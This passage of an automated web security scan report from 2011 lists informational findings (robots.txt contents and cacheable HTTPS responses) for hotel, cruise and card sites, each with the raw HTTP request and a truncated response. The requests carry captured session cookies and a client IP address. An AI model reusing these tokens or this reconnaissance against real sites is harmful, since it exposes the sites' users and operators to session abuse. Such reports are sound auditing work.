HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 14 Jan 2011 18:27:16 GMT
ETag: "3ddab-956d6900"
Accept-Ranges: bytes
Content-Length: 253355
Content-Type: text/plain
Cache-Control: max-age=65634
Expires: Tue, 04 Oct 2011 07:07:52 GMT
Date: Mon, 03 Oct 2011 12:53:58 GMT
Connection: close

User-agent: Googlebot
Disallow: /zh_CN/ch/error/
Disallow: /zh_CN/dt/error/
Disallow: /zh_CN/es/error/
Disallow: /zh_CN/gi/error/
Disallow: /zh_CN/hp/error/
Disallow: /zh_CN/hh/error/
Disallow: /zh_CN
...[SNIP]...
22.15. http://tag.yieldoptimizer.com/ps/ps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.yieldoptimizer.com
Path:   /ps/ps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.yieldoptimizer.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1301680707000"
Last-Modified: Fri, 01 Apr 2011 17:58:27 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 03 Oct 2011 12:56:15 GMT
Connection: close

# go away
User-agent: *
Disallow: /
22.16. http://www.hilton.com/en/hi/promotions/hi_resorts/index.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /en/hi/promotions/hi_resorts/index.jhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hilton.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain
ETag: "0-0-0-5d12"
Last-Modified: Mon, 09 May 2011 18:33:45 GMT
Cache-Control: private
Date: Mon, 03 Oct 2011 12:57:56 GMT
Content-Length: 23826
Connection: close

User-agent: Googlebot
Disallow: /guestlocale/
Disallow: /en/hhonors/login/owner_login.jhtml
Disallow: /en/hi/groups/private_groups/
Disallow: /en/hw/groups/private_groups/
Disallow: /en/hp/groups/priv
...[SNIP]...
22.17. http://www.marriott.com/default.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /default.mi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.33 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 22:28:30 GMT
ETag: "843b7-354-69fd1f80"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Cache-Control: max-age=1507
Expires: Mon, 03 Oct 2011 13:20:36 GMT
Date: Mon, 03 Oct 2011 12:55:29 GMT
Content-Length: 852
Connection: close

#
# Robots.txt file for Marriott.com
# Bans ALL robots from the accessing the following paths
#

User-agent: *
Disallow: /Channels/
Disallow: /reservation/
Disallow: /search/findHotels.mi
Dis
...[SNIP]...
22.18. http://www.marriottvacationclub.com/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /index.shtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marriottvacationclub.com

Response

HTTP/1.0 200 OK
Content-Length: 502
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 20:11:52 GMT
Accept-Ranges: bytes
ETag: "46d86f394b2cb1:4eb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 13:02:58 GMT
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Mon, 03 Oct 2011 13:08:00 GMT

# robots.txt for http://www.marriottvacationclub.com

User-agent: *
Disallow: /aboutus/
Disallow: /ajax/
Disallow: /common/
Disallow: /contact-us/
Disallow: /content/
Disallow: /errors/
Disal
...[SNIP]...
22.19. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 12:53:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: txt; charset=utf-8
Content-Length: 1041

# robots.txt for http://www.opentable.com/

User-agent: *
Disallow: /_LBStatus
Disallow: /admin
Disallow: /aspnet_client
Disallow: /bin/
Disallow: /Components
Allow: /img/restimages
Allow: /i
...[SNIP]...
22.20. https://www2.ncl.com/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.ncl.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 29 Sep 2011 05:29:22 GMT
ETag: "41a1ef-5be-4ae0dca7f7080"
X-Ncl-SLog: (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=34573
Expires: Mon, 03 Oct 2011 22:39:19 GMT
Date: Mon, 03 Oct 2011 13:03:06 GMT
Content-Length: 1470
Connection: close
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:03:06 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:03:06 GMT; path=/; domain=ncl.com

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
22.21. https://www201.americanexpress.com/cards/Applyfservlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www201.americanexpress.com
Path:   /cards/Applyfservlet

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:02:56 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 30 Sep 2010 03:19:32 GMT
ETag: "d6b2-33b-8bf0f900"
Accept-Ranges: bytes
Content-Length: 827
Connection: close
Content-Type: text/plain

# American Express
# Format is:
# User-agent: <name of spider>
# Disallow: <nothing> | <path>
# Date By Reason
# 20011119 SEU Initial robots
# 20090810 AET Prevent inde
...[SNIP]...
22.22. http://www3.hilton.com/en_US/hi/search/findhotels/passiveSearch.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/passiveSearch.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www3.hilton.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 14 Jan 2011 18:27:16 GMT
ETag: "3ddab-956d6900"
Accept-Ranges: bytes
Content-Length: 253355
Content-Type: text/plain
Cache-Control: max-age=60186
Expires: Tue, 04 Oct 2011 05:36:01 GMT
Date: Mon, 03 Oct 2011 12:52:55 GMT
Connection: close

User-agent: Googlebot
Disallow: /zh_CN/ch/error/
Disallow: /zh_CN/dt/error/
Disallow: /zh_CN/es/error/
Disallow: /zh_CN/gi/error/
Disallow: /zh_CN/hp/error/
Disallow: /zh_CN/hh/error/
Disallow: /zh_CN
...[SNIP]...
23. Cacheable HTTPS response  previous  next
There are 12 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

23.1. https://secure2.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.hilton.com
Path:   /en_US/hi/reservation/book.htm

Request

GET /en_US/hi/reservation/book.htm?execution=e18s1 HTTP/1.1
Host: secure2.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmid=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.tst=0.951; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635785203:ss=1317635584777

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:57:41 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 603
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<html>
<head><title>Page Unavailable</title>
<body bgcolor="#ffffff" link="#2222bb" vlink="#2222bb" alink="#FF0000" topmargin="25" leftmargin="50">
<table width="489" align="center"><tr><td>
<center>

...[SNIP]...
23.2. https://secure2.hilton.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.hilton.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: secure2.hilton.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmid=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-972174836%7CBwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.tst=0.951; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635785203:ss=1317635584777; JSESSIONID=9A01C76E93C4F83F0100CE2C22AE52F0.tc12

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:57:42 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 603
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<html>
<head><title>Page Unavailable</title>
<body bgcolor="#ffffff" link="#2222bb" vlink="#2222bb" alink="#FF0000" topmargin="25" leftmargin="50">
<table width="489" align="center"><tr><td>
<center>

...[SNIP]...
23.3. https://www.cruisesonly.com/bcss/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...
23.4. https://www.cruisesonly.com/lib/javascript/display/iphone_js.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /lib/javascript/display/iphone_js.asp

Request

GET /lib/javascript/display/iphone_js.asp HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.cruisesonly.com/bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private

23.5. https://www.marriott.com/!crd_prm!.!cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /!crd_prm!.!cm

Request

GET /!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=508779&crd_cnt=0.01&crd_tpb=1317646588001&crd_olt=7782 HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_pers=%20s_lv%3D1317646590532%7C1412254590532%3B%20s_lv_s%3DFirst%2520Visit%7C1317648390532%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646586583}; fsr.a=1317646594850

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 20 Apr 2011 13:16:59 GMT
ETag: "c001-327-708888c0"
Accept-Ranges: bytes
Content-Length: 807
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:56:23 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: MI_SITE=prod3;path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
23.6. https://www.marriott.com/default.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /default.mi

Request

GET /default.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/expiredSession.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":4,"to":5,"c":"https://www.marriott.com/reservation/expiredSession.mi","lc":{"d4":{"v":4,"s":true,"e":3}},"cd":4,"sd":4,"f":1317646766835}; s_pers=%20s_lv%3D1317646786238%7C1412254786238%3B%20s_lv_s%3DFirst%2520Visit%7C1317648586238%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/reservation/expiredSession.mi%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.marriott.com/reservation/cleanSession.mi%2525253Furl%2525253D/%25252526marshaTimeOut%2525253Dfalse%252526ot%25253DA%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:27 GMT
Content-Length: 99910
Connection: keep-alive


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
23.7. https://www.marriottregistry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriottregistry.com
Path:   /

Request

GET / HTTP/1.1
Host: www.marriottregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 13:02:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...
23.8. https://www.ncl.com/nclweb/common/TealeafTarget.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/common/TealeafTarget.jsp

Request

POST /nclweb/common/TealeafTarget.jsp HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
Content-Length: 827
Origin: https://www.ncl.com
X-TeaLeaf-Page-Render: 2182
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2011.03.15.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /nclweb/secure/loginBookedGuest.html
X-TeaLeaf-Browser-Res: 3
Accept: */*
Referer: https://www.ncl.com/nclweb/secure/loginBookedGuest.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

<ClientEventSet PostTimeStamp="1317646354629" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="2182" DateSince1970="1317646324619" PageId="ID7H52M2S437R0.8089260344859213" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95
Date: Mon, 03 Oct 2011 12:52:14 GMT
Connection: keep-alive

.

<html>
<body>
Response

<hr>
Read 827 bytes in 0ms.

</body>
</html>
23.9. https://www.ncl.com/nclweb/secure/bookedGuestLanding.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/secure/bookedGuestLanding.html

Request

GET /nclweb/secure/bookedGuestLanding.html HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/cruise-destinations
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 55571
Date: Mon, 03 Oct 2011 12:51:26 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


My NCL</
...[SNIP]...
23.10. https://www.ncl.com/nclweb/secure/loginBookedGuest.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/secure/loginBookedGuest.html

Request

GET /nclweb/secure/loginBookedGuest.html HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.ncl.com/nclweb/secure/bookedGuestLanding.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
